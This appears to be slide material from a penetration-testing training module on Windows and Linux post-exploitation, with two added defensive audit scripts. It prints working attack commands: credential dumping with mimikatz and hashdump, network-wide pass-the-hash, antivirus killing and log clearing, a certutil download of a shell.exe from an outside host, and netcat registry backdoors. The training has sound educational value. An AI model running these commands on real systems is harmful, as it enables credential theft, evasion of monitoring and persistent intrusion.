1. www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #6
Post Exploitation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
Topics
• Domain Exploitation
• Meterpreter
• Crackmapexec
• Empire
• Local Privilege Escalation
• Persistence
• Pivoting
Domain Exploitation
• To be able to penetrate all systems:
• Vulnerabilities are used to penetrate target systems, and user or session information is gathered.
• Systems can also be penetrated with brute-force attacks.
• Files containing detailed information about a given system can be used to attempt to penetrate additional systems.
• As a result, the path to Domain Admin opens.
• The control is in your hands!
Domain Exploitation
• Generally, when a Windows system is penetrated:
• The SAM and SYSTEM files are accessed.
• %WINDIR%\system32\config\SAM
• %WINDIR%\system32\config\SYSTEM
• The password hashes are extracted from these files with samdump2.
• Or hashdump is run in a Metasploit session.
• The obtained hashes are cracked, or the pass-the-hash method is used to try them across the entire network.
Mimikatz - Demo
• Plain-text passwords can be obtained from memory with Mimikatz.
• https://github.com/gentilkiwi/mimikatz
• mimikatz # privilege::debug
• mimikatz # sekurlsa::logonpasswords
Browser Passwords
• There are several browser modules available on Metasploit.
• run post/windows/gather/enum_chrome
• run post/multi/gather/firefox_creds
• git clone https://github.com/Unode/firefox_decrypt.git
• Nirsoft software can be used
• https://www.nirsoft.net/utils/web_browser_password.html
MS14-068 Vulnerability
• A critical-level vulnerability, since it allows access to Domain Admin authority.
• A Kerberos vulnerability.
• The PyKEK script can be used for a simple exploit (https://github.com/mubix/pykek).
Meterpreter
• It is an advanced payload found in Metasploit that, thanks to its post-exploitation modules, lets you perform a number of actions quickly and by hand.
• Can be thought of as Superman.
• Post exploitation is about ensuring the admin privilege is never lost.
Post Exploitation
• Refers to actions after an exploit.
• Target-specific research techniques
• Steps to obtain password summaries
• Discovering configuration files
• Action of identifying domain users
• Obtaining passwords from the memory
• Inventory extraction
Post Exploitation - Demo
• Meterpreter Basic Commands
• sysinfo – Used to obtain information about the system
• background – Moves sessions to the background
• getuid – Used to obtain uid information
• upload – Uploads files to the system
• download – Downloads files from the system
Post Exploitation - Demo
• Meterpreter Basic Commands
• screenshot – Obtains screenshots
• ps – lists running processes
• migrate – Used to move into another running process to maintain persistence
• getsystem – Used for privilege escalation
Post Exploitation - Demo
• Meterpreter Basic Commands
• hashdump – obtains the password hashes of the user accounts
• run hashdump – runs the hashdump post-exploitation module
• record_mic – used to record audio
• webcam_snap 1 – takes a picture with camera 1 if the system has one.
Post Exploitation - Demo
• Listening to the target system's network traffic using Meterpreter.
• use sniffer – loads the sniffer extension.
• sniffer_interfaces – shows the interfaces.
• sniffer_start 3 – records packets on interface number 3.
• sniffer_dump 3 /tmp/dump.pcap – writes the traffic captured on interface 3 to /tmp/dump.pcap.
Post Exploitation - Demo
• Other Meterpreter commands
• enum_firefox – extracts data from the Firefox browser if it is installed on the system.
• clearev – used to clear the event logs.
• killav – used to shut down antivirus software.
• run get_application_list – lists all the applications installed on the system.
• run hostedit -e 10.0.1.5,facebook.com – "Sir, how can I hack Facebook accounts?" :)
• enable_rdp – used to activate the RDP service.
Post Exploitation - Demo
• Using Meterpreter post-exploitation modules
• run post/<TAB>
• use post/windows/gather/enum_domain – used for domain enumeration.
• run post/windows/gather/enum_applications – discovers the applications installed on the system.
• run post/windows/gather/credentials/winscp – gets the saved passwords from the WinSCP application installed on the system.
Post Exploitation - Demo
• Commands used for privilege escalation
• getsystem – if there is a way to obtain NT AUTHORITY\SYSTEM privileges on the system, it uses that way to make you the most privileged user.
• bypass_uac – used to bypass UAC.
Post Exploitation - Demo
• Meterpreter special modules
• incognito – it is life <3
• use incognito – loads the incognito extension.
• list_tokens – lists the tokens available on the system.
• impersonate_token – impersonates one of the tokens available on the system.
• When you capture a domain admin token, you can escalate your privileges by using incognito.
Post Exploitation
• Empire is a post-exploitation tool that uses PowerShell and Python.
• Its modules come with a flexible, cryptographically secured communication structure for use on target systems in the post-exploitation stage.
• If the system uses a security measure such as an antivirus, Empire can bypass it because it uses PowerShell.
Post Exploitation
• Empire has three main features.
• We use these features and the modules they include in the
post-exploitation process.
• They are:
• Listeners
• Stagers
• Agents
Post Exploitation
• The first thing we can do is start a listener to get the
shell through Empire just like in Metasploit.
• With the listeners command, we enter the listeners
menu and all the active listeners are listed.
• After selecting our listener and adjusting the settings, we
activate the listener with the execute command.
Post Exploitation
• After starting a listener, Empire provides various stagers that, when run on the target system, connect back to that listener.
• The usestager <tab> command lists the available stagers; after selecting one suitable for our purpose and performing the necessary configuration, the execute command is used to run it.
Post Exploitation
• After the listener is started and the stager is run on the target system, the agents module reports the newly opened connection.
• The agents command is used to navigate to that menu.
• To interact with the opened connection, the interact <connection-name> command is used.
Post Exploitation - CME
• Crackmapexec (CME)
• It is like a Swiss Army knife.
• It has a lot of features to speed up your network-based attacks.
• With a single command you can execute pass-the-hash attacks on the whole network, use the tokens available with mimikatz to perform memory dumps, etc.
Post Exploitation – CME – Demo
• You can scan the entire network with a username and password.
• crackmapexec smb 10.0.1.0/24 -u Administrator -p Password123!
• You can perform a Pass the Hash attack.
• crackmapexec smb 10.0.1.0/24 -u Administrator -H
E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949
• You can run mimikatz on all the systems that you have successfully penetrated.
• crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz
Post Exploitation – File Transfer
• After penetrating a system, you may not have capable agents like Meterpreter at your disposal to perform file transfer. You can use the following commands to transfer files within the shell you already own.
• Python 2:
• Start service: python -m SimpleHTTPServer 8000
• Get with client: wget http://10.0.1.5:8000/file
• Python 3:
• Start service: python -m http.server 8000
• Get with client: wget http://10.0.1.5:8000/file
Post Exploitation – File Transfer
• You can also perform file transfer after starting the Apache service on your own machine.
• Caution! If the web server has the file's language installed (example: PHP), the file may be executed rather than served as raw content.
• Start service: service apache2 start
• Get with the client: wget http://10.0.1.5
• It can also be done with PHP.
• Start service: php -S 0.0.0.0:8000
• Get with the client: wget http://10.0.1.5:8000
Post Exploitation – File Transfer
• What if the system you hacked is Windows?
• You can use bitsadmin.
• bitsadmin /transfer n http://domain/file c:%homepath%\file
• You can also use certutil.
• certutil.exe -urlcache -split -f "http://10.10.15.76:88/shell.exe"
• You can also transfer files with nc. If the nc binary is not present on the target system, upload and run it.
• nc -l 1337 > filename
• nc 10.0.1.6 1337 < filename
• The usage may vary with the nc version. For example, when specifying the port some versions also require the -p parameter.
• Example: nc -l -p 1337
Privilege Escalation Attacks
• There are multiple privilege groups on the system.
• For Linux and MacOS root is the user with the highest privileges while for Windows it is the Administrator
user.
• With privilege escalation attacks any user can get access to a privileged user’s credentials.
• Local Exploits!
Privilege Escalation Attacks
• Why do we need them?
• To read and write on sensitive files in the system
• To maintain persistence on the system
• To seize the system with full privileges
• For advanced monitoring of the system
Privilege Escalation Attacks
• Linux privilege escalation attack types
• Kernel exploits
• Exploitation of services running with root authority
• Exploitation of programs with the SUID bit set
• Exploitation of users with sudo rights
• Exploitation of misconfigured cron jobs
Privilege Escalation Attacks
• Kernel Exploits
• Kernel exploits are programs that use vulnerabilities in the Linux kernel to run code with elevated privileges.
• A successful kernel exploit usually lets the user run commands with superuser (root) privileges.
• For an exploit to work on a target system, the machine must run a vulnerable kernel version, there must be a way to deploy the exploit on that machine, and we must be able to execute it once it is deployed.
Privilege Escalation Attacks
• CAUTION!
• Kernel exploits should always be used as a last resort. Most of the exploits found online are not stable and may crash the system on which they are run. The exploits may also leave traces and logs on the target system.
Privilege Escalation Attacks
• Exploiting services running with root privileges
• Exploiting any service that runs with root privileges always results in a root shell. Therefore, you should always check which services are running on your system and whether they run as root; if that is unnecessary, do not run them with root authority.
Privilege Escalation Attacks
• SUID Bit Exploit
• SUID (Set User ID) is a Linux feature for running a program with the privileges of a specified user rather than those of the caller. For example, the ping command needs root privileges to open raw network sockets, so the ping binary is installed with the SUID bit set and root as its owner. In this way every user can use the ping command.
Privilege Escalation Attacks
• Sudo Privilege Exploitation
• If any sudo user credentials have been accessed then any command can be run with root privileges
by using the user's sudo privileges.
Privilege Escalation Attacks
• Cron Job Exploit
• If a script or binary that is run by a cron job is writable by us, we can obtain a root shell by editing that script or binary.
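A defender can audit the same two conditions the slides describe: SUID binaries that are not expected on the host, and scripts in root's cron directories that other users could modify. The Python below is an added example, not part of the training material; it builds a constructed sample tree so it runs without touching the real filesystem, and its SUID allowlist is an assumption to adjust per distribution.

```python
import os
import stat
import tempfile

# SUID names expected on a typical Linux host (assumption: illustrative; check your distro's package list).
SUID_ALLOWLIST = {"ping", "sudo", "su", "passwd", "mount", "umount", "chsh", "newgrp"}

def find_suid_outside_allowlist(root):
    """Return SUID/SGID regular files under root whose name is not allowlisted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: never follow symlinks
            if (stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID)
                    and name not in SUID_ALLOWLIST):
                hits.append(path)
    return sorted(hits)

def find_tamperable_cron_scripts(cron_dirs, trusted_uid=0):
    """Return scripts in cron directories that someone other than the trusted owner could
    edit: group/other-writable, or owned by another uid. Root's cron would run the edit."""
    hits = []
    for d in cron_dirs:
        for name in sorted(os.listdir(d)) if os.path.isdir(d) else []:
            path = os.path.join(d, name)
            st = os.lstat(path)
            writable_by_others = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            if stat.S_ISREG(st.st_mode) and (writable_by_others or st.st_uid != trusted_uid):
                hits.append(path)
    return hits

def build_demo_tree():
    """Constructed sample tree: a fake bin/ with an expected and a stray SUID binary, and a
    fake etc/cron.daily with one sane and one world-writable script."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "etc", "cron.daily"))
    for rel, mode in [("bin/ping", 0o4755),                   # expected SUID binary
                      ("bin/backup_helper", 0o4755),          # stray SUID binary: finding
                      ("etc/cron.daily/logrotate", 0o755),    # fine
                      ("etc/cron.daily/cleanup.sh", 0o777)]:  # world-writable: finding
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root

def audit_demo():
    """Run both checks over the constructed tree; returns findings relative to its root."""
    root = build_demo_tree()
    suid = find_suid_outside_allowlist(os.path.join(root, "bin"))
    cron = find_tamperable_cron_scripts([os.path.join(root, "etc", "cron.daily")],
                                        trusted_uid=os.getuid())
    return ([os.path.relpath(p, root) for p in suid], [os.path.relpath(p, root) for p in cron])
```

On a real host you would call the two checks with `/` and `["/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly"]` and the default `trusted_uid=0`.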
Privilege Escalation Attacks
• Recommendations
• Scanning target systems first with scripted tools like LinEnum gives us a lot of information about the system.
• It is a good idea to search the target system comprehensively: from past experience, some users are known to store credentials in .txt files found in arbitrary folders on the computer.
• If credentials are discovered, a privilege escalation attack may become needless.
Privilege Escalation Attacks
• Windows privilege escalation attack types
• Windows Kernel Exploit
• Migration with Meterpreter
• Stored credentials
• Domain Exploitation
Privilege Escalation Attacks
• Automatically scans the target system to reveal vulnerabilities that have not been patched.
Privilege Escalation Attacks
• With this module, we can capture the password hashes of the users on the target system.
Privilege Escalation Attacks
• With this module, you can escalate your privileges by migrating into any process that runs with Administrator privileges on the target system.
Privilege Escalation Attacks
• Privesc_Check Script
• https://github.com/pentestmonkey/windows-privesc-check
Persistence
• Persistence is a method that ensures a permanent presence on the target system after receiving a shell. This can be any script or backdoor that has been injected into a running process. The rest is up to the hacker's imagination.
Persistence
• Technique - Backdoor
• Backdoors are the first and easiest methods that come to mind.
• Many of these can easily be accessed from online information security communities.
• The downside is that backdoors can easily be detected.
Persistence
• Techniques - Direct Code Injection
• Adding malicious code without damaging already running applications.
• Since a new application is not executed and injection is only performed on an already running
application, detection is almost impossible.
• The downside is that the persistence is lost when the system is rebooted.
Persistence
• Metasploit – Persistence Module
• After receiving the Meterpreter shell on the target system, the run persistence command is executed with the necessary settings. In this manner Metasploit automatically places a backdoor on the system. Later on, a shell can be retrieved from the specified IP address and port at any time.
Persistence
• s4u_persistence module
• Creates a scheduled task and the
shell can always be retrieved
thanks to this scheduled task.
Persistence
• registry_persistence module
• This module creates a payload that runs during boot and embeds it in the system. Thus the system runs the payload every time it is rebooted, and the shell can be retrieved.
Persistence
• Netcat Use
• Netcat is a network tool for reading and writing data over TCP/IP. It can be used to maintain persistence on the target system.
• First, the nc.exe file is uploaded to the target system.
Persistence
• Netcat Use
• The registry value is then set to run nc.exe.
• Firewall rules are added to allow the target system to run the nc.exe file, and the firewall is disabled.
Persistence
• Netcat use
• We now have a backdoor on the system. Using Netcat we can get a shell from the target system whenever we want.
• nc -lvp 10.0.0.55 1337
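Checking the Run key for this kind of entry is the matching defender-side step for the registry-based persistence above (the registry_persistence module and the nc.exe registry value). The following Python is added here and is not from the slides: it parses the text output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (a constructed sample is embedded) and flags entries that point at a known remote-shell tool, at a user-writable directory, or at a script; the tool list and directory hints are assumptions.

```python
import ntpath
import re

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output;
# the nc.exe and .vbs entries mimic the netcat and Metasploit persistence the slides describe.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    svchost    REG_SZ    C:\Users\Public\nc.exe -l -p 1337
    Updater    REG_SZ    "C:\Windows\Temp\update.vbs"
"""

# Path fragments an unprivileged user can write to (lower-cased, backslash-delimited).
USER_WRITABLE_HINTS = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\programdata\\")
# Assumption: illustrative list of remote-shell tool names; extend it with your own.
SHELL_TOOL_NAMES = {"nc.exe", "ncat.exe", "netcat.exe"}
SCRIPT_SUFFIXES = (".vbs", ".ps1", ".bat", ".js")

VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")

def parse_reg_query(text):
    """Yield (value_name, data) for each value line of `reg query` text output."""
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            yield m.group("name"), m.group("data").strip()

def program_path(data):
    """Extract the executable path from a Run value: the quoted path, or the first token."""
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]

def classify(data):
    """Return the reasons an autorun entry deserves a look; an empty list means unremarkable."""
    low = program_path(data).lower()
    reasons = []
    if ntpath.basename(low) in SHELL_TOOL_NAMES:
        reasons.append("known remote-shell tool")
    if any(hint in low for hint in USER_WRITABLE_HINTS):
        reasons.append("program in user-writable location")
    if low.endswith(SCRIPT_SUFFIXES):
        reasons.append("script rather than a binary")
    return reasons

def suspicious_autoruns(text):
    """Map value name -> reasons for every flagged entry. Legitimate per-user installs such
    as OneDrive also live in AppData, so triage by signer or hash before calling it malicious."""
    findings = {}
    for name, data in parse_reg_query(text):
        reasons = classify(data)
        if reasons:
            findings[name] = reasons
    return findings
```

The same parser works on the HKLM Run and RunOnce keys; the scheduled task created by s4u_persistence needs a separate check of `schtasks` output.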
Pivoting
• Imagine a corporate structure.
• There is an open server and this server is connected with
other internal systems.
• You have infiltrated this server from the outside and you
want to have access to the internal network as well.
• This is exactly what is referred to as pivoting.
Pivoting
• You can use tunneling techniques to perform pivoting.
• If the target institution has a proxy server, then you have pivoting resources in your hands.
• SSH tunneling techniques can be used.
• sshuttle is the best tool.
• A poor man's VPN over SSH :)
• sudo apt-get install sshuttle
• sshuttle -r root@ipaddress 0.0.0.0/0 -vv
Pivoting with Metasploit
• You can also use the Meterpreter agent in Metasploit to perform pivoting.
• You first have to add a route.
• run autoroute -s network/subnet
• run autoroute -p : lets you check the routes you have added.
• You may want to perform port forwarding.
• portfwd add -l 88 -p 80 -r ipaddress
• Firefox -> ipaddress:88